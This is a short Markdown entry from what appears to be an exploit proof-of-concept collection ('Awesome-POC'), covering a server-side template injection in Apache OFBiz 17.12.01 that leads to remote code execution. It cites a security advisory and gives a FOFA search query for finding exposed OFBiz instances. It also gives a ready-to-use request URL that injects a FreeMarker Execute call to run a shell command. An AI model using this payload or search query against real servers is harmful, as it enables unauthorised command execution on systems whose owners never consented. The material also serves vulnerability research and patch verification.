Awesome-POC/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
2022-12-05 17:54:08 +08:00

25 lines
470 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache OfBiz 远程代码执行 RCE
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO
```